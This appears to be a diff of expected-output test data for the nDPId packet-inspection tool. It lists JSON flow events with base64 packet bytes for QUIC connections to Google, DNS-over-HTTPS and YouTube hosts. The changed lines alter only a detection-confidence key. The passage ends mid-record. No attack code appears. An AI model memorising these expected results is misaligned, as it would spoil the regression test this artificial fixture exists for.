02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1621495335381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335381,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFetAAH4RYBGokEAFgPgYAemJAbsFTnpTy\/8AAB0IqORxJIJl5AcANwCt8wk1cWTApsLKg0qFIIeFQdL8SjnJ21Nj9C4ozIKEt\/+wUZf6f1dPuOm0h1m6yoEiECIbZZdE\/WQnpsKHgdsGaR5qXSnOzRKlmZEms2BJMUJ1gJU+1vqiiTqSMdYTSeQg70VBUuM+3x9Wsw2E03o+Z1GMG+25\/n6NwMjxWm+gXFY1NRlTMkV3W5wOYWyWtaUEJ1GuxnVEaMGpdzPW1AV77AHNHDn1TnbAucEKPzy2Z7cXCuzDt\/9H7U8VZWCbuaotZkdM07nzYkghQ2qDyvNpXGhSNUL7bHDAX3gyAQajMLIOzoUKNAKYaqvN115jAWJ17Leuno6gulXzhvDTc6h49GuoiUQ8KI+Xu59zdoInlbDcFVAjf1jbarKGcwBIepEYbQYRji12orl2Cd2J\/1+Bw0w1aY5+A4\/nXR8NpyrOqilQzMZ\/djaKFpDp2wQtkiivyepGkDCNsqJWpv3Mpp16MQWh3knQKrxErpfqX6AvVazEihxnMQ4\/lZQJF85G6i5\/hhqxRgpLlfxqf8yDAXnP41Vs+9APNn2BuhKubR4aoRulNYKJMq1HmrxFJkWYPmROIqVMuTJ5gGI14OGVc0hdb1JAS5T9H6PUnfDQ4xy0WRLpNbJg4pHooWK\/poGpYPpx9oWdXpFju2U2aLPXQHaalwlFujvwO+z5Kp3CS87EGXs0ZDZDKSALKh0LVBiIak00fb11rcVbdm+DMJDj4QQFBjyVXvYpD\/s3UWsVChEZkFE3nedCDj7vh+5c4gCp05wL1CyNlvX0yC9nZNrd9PEWwozxtSS7auEid+pYxl09QHK5t1svYOMpxEDTebjdq4hAcn\/6xmLg313Z5mnqQGjc1IbzLZAaSMXJYCkfIC83JKqjSEnj4IL1MdqJxOx6HDNp9YD7d6\/\/f8\/wL9ELZHhINgHddlPCKvb86VVYNVvmKys1qBiqdarfutbDcX5q7MbS59s0zBaWxPuzIpu\/\/y4WbjIRgu2TWCnWJSdPC7Qjc2fNbgvcjVvEkTgtAb+pWGsml8538kvECQrljr246X7pAeQ6Rl328xa0txA2awkdTR2Wk\/07SZvUhvNVrpZHNN\/uBdVi\/gqFbPaQtmNYr7ccvsLKKUtd3trzmLlGJjqZrAGduvrEEW9NJT5bIWNvWFv4br5yveMnNX4bpaDG1haMmzx7U6OlmM3KOomrvbRevEeZKz4OYXdrS0x7AiJn3cxU8ZV6t2UtyD2rRiXkxP0GH0SMLlUVrIeDAeXS61FKsQViw4KbhZuYC7JG35I7aDnBvJpT2cojLKnh8D22UVQUC7YIz+L+JkQfLKHmScUY4befIcVYhsE4zFKdj4FbcDDZssysQxUIzWPXjqO85RbZkVhwJZ6QcDMA\/InscSDocIji+mME\/SdF8AIFHFhYqcxF3XJEkr1XiAnrNSjsZrdhd8QomNgx9\/Jva6PaDsTSQtI7y2LQGeZPv7cqaxwKiK0J7JoDrx9arAHuWtQe5bt86Bh81MG6c3EsNnsRmoWdIC6JrwhXNPDY0QTlJMC8ody4xB5guQa259jQwXtYVl6cLF2RxeWEY2NqprP1yX7UldI23tFbTyJMb\/AcwD1vmzT28UF\/oSbC\/3S38SJgbg9+aEbmVFuD944Pv50FJTPzleYonVC5A2YOH0x1NO5XI3iKQM6C\/1v4Lh1wCMNgPJK1VF9Fhh0Ta+l9iAqD9rEm\/DoiFxRwcYyligkxTdm1h3T4\/oYT\/Z8Mgvo1yu23DDNKFJAsZXZlSE0AuNsh5V+\/sk2BjDwu"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1621495335383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335383,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNPhAAH4RJE2okEAFmWIcTue\/AbsFTvGexv8AAB0IOo3jhsRNjQEANwBHxNQXfZgQnNGpal0okl9ccuiV6Xx1VVVSOoSDjFN\/WqaQd3bf4jLTMfe18yDQYl1ksGsIMjJE\/X+k1eq0cqPlOyX+nVZA3CKUBe+I06Q01b7sXmYYhr0WJT3kaR9mro469WK6gpT7T4TFYwMpIrtaDA6muvL250OHHrKx2t\/b3j+rVBhRdyz83flQDLS5iJyeiPX3ozrRQ8ufwzIu7VjaOgPDLFPf9CLW6Ex0JWr6LOuOaf71I4Deuwp47CbRSo1v1DJgKlHv23GjLnkhuFaey4\/n8OHVzpyX5hGwEHk01EXAy2I\/0t6k5RU07Rm\/9iC1+Anc0an6X\/5En\/QcUFXIDKQQ0Thy7dKi6TNSrUp6a1tBrt6NwQ27tW\/1KPud11aAq4HGehTpL4HrcEZJ6WRfhBzyOJR5FMA0B\/aet9V93fh5IdqLX+OC3ZB1nATGbkICNniKaUV89lf8n83peKZ0ObXe1ZxWdkVdcZU3LEFcVpo1RTuE1L7x8jQcdWDYcvdEn1Te8UHdP7yraROFUsioeAfpcF778rK+5okAR+2XHHnSdnOHlohFWI1nH1SREZrVHh7JRhDyl8Ucr\/BgNlTDtZwOhLvHQrKAKbHZNh+Yop6avCoxdZcyMauux9VIsx1V6ZcFLgXOdrsIQBCslYzV1nQT77qZUFP5pFFJi6yKZK6JqNzTNo4XAtE\/EmrXjIctL0spz7CUAko8ZCx\/QlZojgyY6l8\/mF\/t0GdVlTfXrBS8k9H2GgvfGIItBGDd7oEIXE8\/x7XEay01BVjgSd+i\/fFLDpHQ80ZkWzpHV3HT72SAoHktM64YPvjZEUI1hUeWmJuYJPomtO+bUx7kO\/d90sGY0xqsv2HBsIxKXVokT0NpQb4HQ\/\/6\/ISGzQgrUOpdVkOQ4Ov2jxibQpg6Vu4ywzr3gBFjvKwX+cgOdNrtcrtCO\/z+jSIIOWVj3BibuGPE9poYNEM8A3bcrqLJXyc3G89K4CYVPfqcyne8lrvC0IGJ1zrYdFUx3gECn4opv\/gdQJXtuOTrUVmH71S5XqG9H0DBG\/sLfb5rsQm+LQOFMiN+jrhKPRrA402Fu4L9OwLTll3iaAH2TP4qDHpL4lAHSm08OEvyaElT80VWlv2GLl35bqH2Y39bpMCq7CkCZv3UgOh3l\/9+mPbAjeGFb00aqhN2vkH0TkgWXcwcZksbOsM+yV8OhtptiXBR4EU\/g0BqPYUf\/i17kayR5JWkci2qp+nf5YWFnxyDprRblGELorjZFQUlksU2RdG4SN1MF4A1eeKjPZlM0HL1zDrMIwtALb02IzmQZ\/Bm\/WUiUYaKyLJwcs2ZwEM2kLSrZp8uJyNf5M3uLoVEDHlKNLba7DN1ef+MMOa7CGGrjpqpw0sZPT5ONzbaAHLUCfOebBzKE9NIEP7C8UHDBrcv6G5CW3oNLes3+0POLAa4kPIRIBua7JjztiSUYQh2RHd4OJOvzA71BVztSPvZl673nw7XzMsbdr5yRgpPAO5OfmfVTBLj873AmjrBo38xLoYPXshplGzi0ikFEynS07HFKA5UOZGq85zAFFcWI5HWixUpkCsAvcwId0fp1BUC9FDRIAhfc\/\/KaShDxhdYfYHSMEK9PXtdq234Pe7ioWnm11vuwdmo3GVpj2tG8uaQQ7pQ4Hvyo2VkgXgRXCH7WUw5XTIbb2ts1zddx2Lh9L2HgixwQtoUEyPMYDhKUevyM22X+x0NPUTz8twzls5Hg0qwDa4hANEFshc4a+3VtH8uy6bSdnlQBUo4quCx"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1621495335836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335836,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+mNAAH4RpI6okEAFJ+NIIPm1AbsFTnliw\/8AAB0I4pZJfic2KdUAAEU0G2\/JHhTaDCySWTsRyHcMkznWFPDz+s6YIbogX+v8zxx769L1qgtkV6CvE8r8hbHRMlJ4aqDQ8cnTd+qnT2W9TfmVMr\/V0QP+6QvVQ48j6rtyLfieLy9\/2EkamXQtFIYCWvvW56wuHj2xCT+50ITw+NRr+y9x0NbAGQWozGRk2nR4BKbEsfWPX5\/wqL6hTsunv94vRDKt7EutCZye28TD9oEZAHOg1MaC1b7h0oQC5kjkApzmv08jnPKI9H9f4j\/JQA77vXtBo3U2wrGwehzISa+gzg27eFe0Lz6CL6yGLEsunuBNCJshBMKrp+ijV2rgvg5UQp7dgHCW\/1wu0moHCOx1d9YiEenWAscqFZzCaENXUAI0EuPYxVrNWL604hKBfbSm6P27VV+gA1ELL9R5AQqvLOn6Gmh7AwXHx1PjRRS9ZZeTZzDOrOpcAi0CggBnKIRIsKE94hUybka\/wHV\/UX8z+55FNlySolQCpZKIkqpC+g\/oYQng3hV51VM7kvO5KqfG5HLUVXPscZuabo1fXFu0wfR+YOWFQmXwAeKLw4wbgsr8gSevv1IhYdTeWBQ3qCSH2Tppj2OqfrOoirytq5pj3XRErAqPiCY9F2o1yNDW1fTSxLigm4qy3VUHhT8BbSneM9jhuRSjXUwtUVQiTkh9fIe5kcjtRbujl3+qnTQpnqGD\/TlHOvndYb4rgexjVKSDC4knc0rUty5gi9WhVovaDbmyNsugebY2WME6BJA8Lu8NcnSunCdew311rjHn1f8ncvLm+i\/OY1PB6SImyOzhch6rbP\/IjlcVBQcR+URjxzQhNnom+dzvRHE5cIEiL+1dwZRuOOr7bNmFIX1287mpzg7yqBscxlRDWH0ocb2H4WsfiWBFpKFARkSseaSsa2eVQAIL2m1eD6Q5t6gvJ\/yS9s8El8JwzhGisbnzry5Xy1K6Eg04XDT1lI9sdOVzonqquNY+LbcWO481trrWSpCApp5pm2FmvuVNAEDcE\/leVs7Upo9W3dNaKtj2RQTYCO\/pqhTPVqYf0nCLrPcAqiD+9T41XijcawBR\/vbqo1tZ4KEM0cmR5k1AUaoIZ3+Bzv6PH6Hce0+kR7CW4Ep2f9lzdo1J22p1axhl4ULPWrGGIQfQXq+n5fOWuwREvJQKtwN0C6+WJUfpd91g1CybKUv8MFVhdUf8Z9tfVjfisE3C9rOjB0k0MjLYkNVv+k18kjbqvZJa1J5DuEtyRwEzwZz267jAgfJf\/XgiOr9BkO\/0aR6plCQdvxTD0K6L19vGxNUgCvzjD4L4h8+noYGT953s8stid+4KJgAdsiOqOYzNzPEmgyvvlweAy2zeSHFiyyWUyyy76HG\/MQrVwaXXVfHNGbKhxR9W0ukaLCsoX3onBUGpohxenfTJlZzKL8f6xYrqmYbQV\/2yxhBOtahomZm56JtJZH9kbZ6pFHt4JM3e21Q9rm\/tDp6i9hxJHFb0VyAuvq537RsbPY1kLQWWEsQCs2Tt3Wk40kzGVdrjq3\/r0EUSSt9U+OnMb23TZeuTw1MquX\/yStzFhFP9JcbwXaoADfNoJC+bQLJ8c6WKIjeXyYcAg7kfdAZVh\/F91xeHHcxgWSpMK9hXHHSBSPCeVl1GoIV7g3PihVhaG2LZCuQE7\/iMdk6e2iUIg8fQ54B2ysh5qBAxEKabZxJZaJfM0WbgXRn3GIisLwUCj8Xw6xgKVQ2XrDNV1619IuEcLLz0LdB+5Ys9lRCOKjjsDK7YhqYsH3VOXEGIEM1hAddYg5zeKKiO"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons2.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons2.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1621495372662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495372662,"pkt":"AAAAAAAAAAEASYHhCABFAAViK7hAAH4RUtKokEAFZ7MouMMGAbsFTkcuwP8AAB0IxZqmm6+AGC8AAEU0bV1phXsNBAyduWQMMwC6OLQYyTAN1FxuQVMaii5rW8BXPGS0FRwk8HrnF9xMFnBPXfvvEo3QBMM3FudHvdk8cEb+Bo8BomOBxFWNxcTXQHnGOYwDJRX3D+VGcXzFwUoYmTqIRQkkUg\/RXDgv4zX29xNTFSJZ2g4nrk8eulw5HhkFc7yauYf\/ApGm95lgsQ1j+7m8PBWklTsQX6hwGdXDIAv02+sMBfhTQchd1a3DETCVvIEvB3zgW19rHL3EGi1JVlsZU4n\/sCu9BlSoqz1gNiX5dZptoecFN1AbSN0j+aDykV86bt8EAW+l7neIOdiEUtSDvZYs0HOSy8d81eka84F4E25AyCh5Jh4qKAUrTwyky1QcKLkyUsb52v0nNZPnkgfOerwlcB6TuTptQskR2whmUpX7JY7NpYzoP+bSiNZixNyHKsy66zeLu36e+mO9OULTXh1nTVJ5nWB3uSmA7NhWQQFE4WUtBQikelX5MZz8WH2ysNSrIGAoo\/2bMBVU0RtpogNGg7hQ5yCYCS9ewZ13uOeB7XptgaMPF1gNLsQtCfhFk6ef\/IGD3LoSbvbOc0HYo+mifMuhyLvoKbzbavtQTxjr\/BN8j3ypDUZBjhEh438y6mmn1f7adohk5c+uxUd8mwi+IBpv8HBmXQY5puUsZypJHNztPV6aJIh6Up0rlLSwWVKrIC8xNAsiNPMAwoGGx\/XVMBulOOZ6hs\/RBHhwegaA+qv64ubbFEADxru3Zq7D\/YYhDD4KHX9f7DbtYtgURUiA6xsJhOOXb3ciQi\/vZzxt6Mh24fTbT1zp6Pmg1q7vP4jIWXIVFXNJCE7CuU9s2seo56SppSuh\/r28+L9mCauWVe2519clc0WesPZGyQOFWVJGUBtGpU8MBYk2YAmeOz2CyqlNn3SdiKTur+zOdGO8ie8klvK7F8QEXDrzQjkWCs8ClQh4UCknNZJa8gpVH4lz8rVeTWyHJza3U1f938XY4whWDpXVkRb2tmvmX1IQF+lQXiMyPE4Unt5vxehyMhS6SLraGYucF6p4h8DCTwkmMnGAS9zwcIT6fW4iTimSLnell1BouaNm3iu0jMNHt2e7LduTiCHwMdWuN6hrjN3aybR6Fj8+ydHkiW93NhFq4rHV3Lc1p0x3e5C1G7Q1KN7isNa\/PRXQczMknABRwlF6fpe6AEEGLlIHjMRGWiSRuK055l\/W1Z5Stz3MgFh+r2imHY4KtoaqO3nmH\/uARGwbFDlT2KtdiBjpaphwsWP6UUNd7tej\/yMGpMNK9JtLMNN7QuwlAvbHLOiDSWu26o0hPm2y6s1kOsNgLW+xn4Vjz7Mz9pfDGHMKpfWIdOZkZ+CUIuGSOeGdxsohrmhXBJ3bEy8ojcL77VhzUqJFSXK3Sf3c1W\/sHBP6HAEV0vYyCWRBfB7RxHZMrq\/EctwoWwOWHOSW+AMSYdLUpbxBV6SLqMAz1UrzSOJ6gRrQidZGXlFTz1kRh+RMKPYHu3oX663ubZ0C3ijx6BnA7L4hpNSWGrcxv53ZUCUkQA7FCWH\/TtcdnTCACzr0u9NEpwAgUC2LlBqHsWix60mIR+jumXfV+1Q+xHwPIy7vySfL2wpvF5qrjTomfEAnUqayNm+QdT1vJhoJyiVlkGVLNP1q5tkX2MdpGs8WF5iStIN2keOB+bcodYn5zmDhSw278mjC+eLZaIRMC0i0\/X+TsinvcSe7w39bNxE5H8w556PjcUlXwNHYH8Zthv+GodkuVXIFYZUQVL\/D1GXp+I7OLMvHEr6e"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r5---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r5---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1621495373983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495373983,"pkt":"AAAAAAAAAAEAguyCCABFAAViV+9AAH4RzFOokEAFdZR1HtxAAbsFTibcwv8AAB0I75EoiW8nS2MAAEU0WdJTtqNtt8MG+zLwh\/UU3FC0zniGr+PwIYUTXnhvS3bBdoRiWOeQ6UKjsBPDLjzDF8dFmOoLoxM9+m6lJwiTWxBqM9JUROj0mguvgkrLqNleDSC7iL4hCrMFjunTfX143sRFPit0bAYIzwvgUuwziEoLnaNvtvkGhiSGOZBzuMVKjTdQ3xkwHQprnY0xWrgmo5nbvHjVfWNFH\/cNC6CCbHqicnUmFRKcm3GMda\/4MP3KAIT+eLw69zCa9uvIEzvXVRl3WvkyZ33qNGuVD+ZvXm9w23J53\/4rlJ3V4StfZ\/Gc4auuB1eSwLog30QSMnyjUcNeP2ibhvLh5O9C35kjOeF\/aDhH1pEcJyXVmWp2G68qb90M\/uLiMTEotX538dX2dgaJ8rTyVlafTtMntoi6sOfMJJIEXEELAkMd2DlCsTy2VQD3iHqC0iVc1r1aw72L8yAQx1n5XURSMoIPLN2keObRP7lr6WcPJ6IMB39kTrMiBZ08mgOSU4GO1bvLA97jrgIr2nR\/Gj8wpcCcF3CPGlyDolBI9IH5a9k9R8RAIrgIzGkXnS9L6V8Nx0Bh6hPBxQnczqK5QuOqW\/vH9tfepppWUj5CKgAm1D02Fq0vKwjtMqpw6ZpAMihlJy9GCI2fNnxnQBbKEz6V\/so8\/ex8K+F2VV8Xlyk+BTFA4OPjxuQ6LZAw3MP6P3hxfm\/8ljkop5\/SI5xDRLcIAhlRNjSOdekQz1mIEo2EnDfSaSb7Gh75g3Y7WAgPEF6enaKqdFVGutsJVL+sNhw8qX0fBTToiOiB9CtWfJJRB1ff5ir4HCC5YgaG7Iny5R+T9zRuNyBNfZ4NPpiM+4EzimASiGJobUimGvk4GeUDE7fXrp72sRKhQCaH5\/nbha+9DmZgdr9mXrl2kbe9PV+IIrHpoitDn2tgzsP8r7ZFigp5npQffggv7haoAs8RFxW9SWR7ZNwh359zkE34\/kZ+CsTC3o+SFo1ZpZSYB7k5YMEXpbC5soIvzfLzo7VRt8wN+9a6G3Vxv65dYuC7WRoZGIss7sDsEtxaXd7D7HVuHBRBXtjzJYxAPsSQ91kS08TNtb53+I8qD12sc9NYwBxuGsxMraUNa\/Z\/\/E6cT8Coz5pCr9T27zIJBVcwrMWBRLfD+FD7WGlOX4REoNLW9dEFCROTtm6uBjditXnfFQ3MtyI4J3eKSt1aSAY6Hz5X1+DPOtei\/MOVBQGkMiqOrqu16dWphn6\/fshP4r6aWOrs7o67fomPJMNklnJ